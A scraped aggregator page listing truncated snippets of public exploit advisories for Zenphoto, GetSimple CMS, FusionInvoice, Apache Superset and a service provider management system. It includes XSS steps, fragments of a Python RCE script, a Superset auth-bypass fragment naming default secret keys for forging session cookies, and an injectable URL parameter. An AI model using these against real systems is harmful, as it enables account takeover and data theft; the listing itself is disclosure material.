vimarsana.com

Page 21 - Exploit Title News Today : Breaking News, Live Updates & Top Stories | Vimarsana

Zenphoto 1 6 Cross Site Scripting - KizzMyAnthia com

Exploit Title: Zenphoto 1.6 - Multiple stored XSSApplication: Zenphoto-1.6 xss pocVersion: 1.6 Bugs: XSSTechnology: PHPVendor URL: https://www.zenphoto.org/news/zenphoto-1.6/Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zipDate of found: 01-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================###XSS-1###steps: 1. create new album 2. write Album Description : 3. save and view album http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/=====================================================###XSS-2###steps: 1. go to user account and change

Software linkExploit titleAlbum description

GetSimple CMS 3 3 16 Shell Upload - KizzMyAnthia com

# Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE)# Data: 18/5/2023# Exploit Author : Youssef Muhammad# Vendor: Get-simple# Software Link:# Version app: 3.3.16# Tested on: linux# CVE: CVE-2022-41544import sysimport hashlibimport reimport requestsfrom xml.etree import ElementTreefrom threading import Threadimport telnetlibpurple = "33[0;35m"reset = "33[0m"yellow = "33[93m"blue = "33[34m"red = "33[0;31m"def print the banner():print(purple + '''CCC V

Youssef muhammadSoftware linkExploit titleRemote code executionExploit author

FusionInvoice 2023-1 0 Cross Site Scripting - KizzMyAnthia com

# Exploit Title: FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)# Date: 2023-05-24# Exploit Author: Andrea Intilangelo# Vendor Homepage: https://www.squarepiginteractive.com# Software Link: https://www.fusioninvoice.com/store# Version: 2023-1.0# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 113.0.1, Microsoft Edge 113.0.1774.50)# CVE: CVE-2023-25439Description:A stored cross-site scripting (XSS) vulnerability in FusionInvoice 2023-1.0 (from Sqware Pig, LLC) allows attacker toexecute

Andrea intilangeloSoftware linkSqware pigExploit titleCross site scriptingExploit authorVendor homepageLatest versionDesktop web browsersMicrosoft edge

Apache Superset 2 0 0 Authentication Bypass - KizzMyAnthia com

# Exploit Title: Apache Superset 2.0.0 - Authentication Bypass# Date: 10 May 2023# Exploit Author: MaanVader# Vendor Homepage: https://superset.apache.org/# Version: Apache Superset= 1.4.1b'thisISaSECRET 1234', # deployment templateb'YOUR OWN RANDOM GENERATED SECRET KEY', # documentationb'TEST NON DEV SECRET' # docker compose]def main():parser = argparse.ArgumentParser()parser.add argument(' url', '-u', help='Base URL of Superset instance', required=True)parser.add argument(' id', help='User ID to forge session cookie for, default=1', required=False, default='1')args = parser.parse args()try:u = args.url.rstrip('/')

Exploit titleApache supersetExploit authorVendor homepageIntel macSuperset version

Service Provider Management System 1 0 SQL Injection

# Exploit Title: Service Provider Management System v1.0 - SQL Injection# Date: 2023-05-23# Exploit Author: Ashik Kunjumon# Vendor Homepage: https://www.sourcecodester.com/users/lewa# Software Link: https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html# Version: 1.0# Tested on: Windows/Linux1. Description:Service Provider Management System v1.0 allows SQL Injection via IDparameter in /php-spms/?page=services/view&id=2Exploiting this issue could allow an attacker to compromise theapplication, access or modify data,or exploit the

Ashik kunjumonSoftware linkService provider management systemExploit titleExploit authorVendor homepageProvider management system

vimarsana © 2020. All Rights Reserved.